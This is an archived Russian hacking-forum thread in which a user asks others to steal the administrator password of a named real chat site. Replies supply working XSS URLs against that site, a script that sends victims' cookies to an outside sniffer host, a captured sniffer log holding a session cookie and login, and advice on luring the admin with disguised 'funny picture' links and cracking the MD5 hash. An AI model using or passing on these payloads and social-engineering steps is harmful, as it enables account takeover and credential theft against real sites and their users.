PDA

Просмотр полной версии : Взлом пароля админа чата


DJ Frost
30.09.2005, 19:54
Здраствуйте, уважаемая администрация AntiChat.ru да и все остальные люди, сидящие на форуме :)

У меня к Вам огромная просьба. Очень хотелось бы, чтобы Вы взломали чат http://chat.ctc-tv.ru и смогли узнать пароль администратора чата. Логин boston.

Заранее, благодарен. Пароль прошу выслать на этот e-mail maxbog2002@yandex.ru

africanec
30.09.2005, 19:59
ага все сразу же побежали <<за благодарность
------------------------------------------------------
за $ предложил бы

DJ Frost
30.09.2005, 20:52
Ну помогите задаром плиз!

Puff
30.09.2005, 21:19
http://chat.ctc-tv.ru/cgi/newchat.exe?<script>alert();</script>

DJ Frost
30.09.2005, 21:28
А что за ссылка? Я ввел, вылезло окошко и Test =
Query =
Form =


Что с этим делать? Объясните пожалуйста!

Puff
30.09.2005, 21:31
Ну еще у тебя алерт выскочил, да?!
Теперь заходи в раздел ХСС на форуме и читай про это!

DJ Frost
30.09.2005, 21:36
Пуф, а без чтения не получится? Ты, пожалуйста, точно скажи, получится ли вообще, или нет. И если да, то пришли мне на мыло результат. Умоляю!

Puff
30.09.2005, 21:38
http://chat.ctc-tv.ru/cgi/newchat.exe?Com=Send&Get=OneMessages&Login=<script>alert(document.cookie);</script>&Room=1&SID=
Вот тебе еще одна ХСС! Какой тебе результат прислать??? Знаешь, я в универе сейчас научную работу пишу, поэтому мне не до результатов.

DJ Frost
30.09.2005, 21:43
Именно пароль мне интересен. Или как вводить логин и узнавать пароль для него. Вот что.

P.s. Извини, что отвлекаю от научной работы.

Puff
30.09.2005, 21:47
А зачем тебе вводить логин(ваще не понял куда ты его собрался пихать) не зная пароль?! Мани народ на сниффер! Про снифер читай тут(http://antichat.ru/sniff/)!
П.С. без читалова ниче не выйдет, конечно если тебе не помогут тут!!!
ПОка! :)

DJ Frost
30.09.2005, 21:49
Ну блин. Вот ты мне дал ссылку с Xss. Мне надо было узнать пароль администратора. Как мне его узнать? При помощи этой ссылке? И вообще для чего она нужна в данном случаи? Объясни пожалуйста!

DJ Frost
30.09.2005, 21:56
Объясните ламеру на пальцах! Очень прошу!

Антошка2003
30.09.2005, 22:47
никак, троянь админа, ставь снифферы и т.д., только тогда может что то выйдет. хотя может база пассов где то лежит.

DJ Frost
30.09.2005, 23:12
А как просечь эту базу пассов?

Антошка2003
30.09.2005, 23:16
а я ипу? если там вообще таковая имееться.

DJ Frost
30.09.2005, 23:47
Если ты не ипешь, то зачем тогда отписываешься? :) Скажи свое предложение по взлому.)

Антошка2003
01.10.2005, 00:30
я предлагаю возможные варианты для сливания паролей.
я так мельком глянул, вроде при реге цвет текста символами ставиться... просмотри внимательнее сам
p.s. форум посмотри. в разделе Уязвимости форумов, форум там phpbb, может пасс на форум и чат один.
p.s.s.Воткни снифер в анкету, во ввод домашней страницы или ещё что и разведи админа на то, чтобы он просмотел твою анкету (инфу по другому), потом скачай прогу md5hashes и бруть пароль, по пповоду md5 тоже написано в разделе "Уязвимости форумв"

SK | Heaton
01.10.2005, 07:27
2 DJ Frost, ну что получил хеш ?!
Вроде Антошка2003 все объяснил и показал пальцем..

DJ Frost
01.10.2005, 10:50
Не получил. Может кто в аську зайти? Объяснить не через форум.

Антошка2003
01.10.2005, 11:06
что получил, торможу что то.

SK | Heaton
01.10.2005, 11:09
Закинь сниффер в свою анкету http://antichat.ru/cgi-bin/s.jpg, на поле Мой сайт.
И сделай так чтоб Админ просмотрел анкету. Потом если все будет тип-топ,
сниффер свое дело сделает..

Есть еще один старый тупой способ, пишешь пост и со ссылкой на http://antichat.ru/cgi-bin/s.jpg и гриш ПОСМОТРИТЕ ПРИКОЛ или что нить в этом роде. они нажимают. а ты тем временим будешь смотреть лог на http://antichat.ru/sniff/log.php будешь ждать хеш своего админа примерно будет выглядит так
member_id=62; pass_hash=2374793277fbb618d2f337d458239719;
ну я так думаю ты знаешь id твоей жертвый ?!

Антошка2003
01.10.2005, 11:13
я уже говорил об этом

SK | Heaton
01.10.2005, 11:18
2 Антошка2003 я в курсе.. Он просто не понял... Вот и до словно пишу.. :)

DJ Frost
01.10.2005, 11:26
Тот админ редко заходит. Ну получу я хеш? И что с ним делать?

NIGHT_WOLF
01.10.2005, 11:40
О а дальше брат серьёзное дело... Расшифровка.
Качаешь PasswordPro и словариков к нему и начинаешь расшифровывать тот хэш который ты вытащил с форума.

DJ Frost
01.10.2005, 12:11
Сможете помочь? :)

NIGHT_WOLF
01.10.2005, 12:14
С расшифровкой ?

DJ Frost
01.10.2005, 12:31
Да, если можно. )

SK | Heaton
01.10.2005, 12:49
посари http://forum.antichat.ru/thread9373.html

Антошка2003
01.10.2005, 13:02
делай всё сам, всё написано доступным текстом, за тебя делать никто не будет, только советовать.

SK | Heaton
01.10.2005, 13:25
и это правда... Если возникнут вопросы. пиши, только сначала ищи в форуме. Об этой теме очень много сказано тут.

TANZWUT
02.10.2005, 10:12
А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...;)

DJ Frost
02.10.2005, 10:38
Значит, как я понял, я получу со сниффера информацию, а затем её засуну в прогу для расшифрования хешей и получу пароль админа??? :)


Тока проблем. А можно как-нить просечь, есть ли там база с пассами? Админ, который мне нужен очень редко заходит. Что в этом случаи делать?

TANZWUT
02.10.2005, 11:16
Да:) по поводу снифа смотри http://forum.antichat.ru/forum37.html
и смотри видео по взлому http://video.antichat.net/videos/Silveran/chatmoscow.rar

Антошка2003
02.10.2005, 12:26
Влад, эт ты типа мне уже написал о том нашем разговоре?))))
Я тоже думал об этом, просто ему еботни много, хотя...

TANZWUT
02.10.2005, 14:47
_http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

[Sun Oct 2 14:23:53 2005] IP=84.ххх.ххх.ххх SITE=chat.ctc-tv.ru
REFERER=http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
QUERY=NAME=03862766249104212349; DISSID; DISNUM; login=extaze
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.2 (build 01102); .NET CLR 1.0.3705; Media Center PC 3.1; .NET CLR 1.1.4322)

Антошка2003
02.10.2005, 14:57
да это ничего не даст, пример ток.

TANZWUT
02.10.2005, 15:01
а я ему пример и показал...
я просто в логе снифа видел всякие там попытки...

DJ Frost
03.10.2005, 17:17
Не х.я не получилось :( :(

К.е.Н
03.10.2005, 18:17
Цитата

А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...Цитата
Снивер ты туда не зальешь можно взломать через скрипты но пробовать тебе пбесплатно никто не будет.

DJ Frost
04.10.2005, 14:51
А если упросить хотя бы показать, как через скрипты?

DJ Frost
08.10.2005, 17:26
Вобщем, как я понял, нихто не поможет.

Woldemar
12.10.2005, 09:02
Помогите разобраться в уязвимости htp://www.chat.kg примерно подскажите что там есть если можно то в ПМ еси что пасиба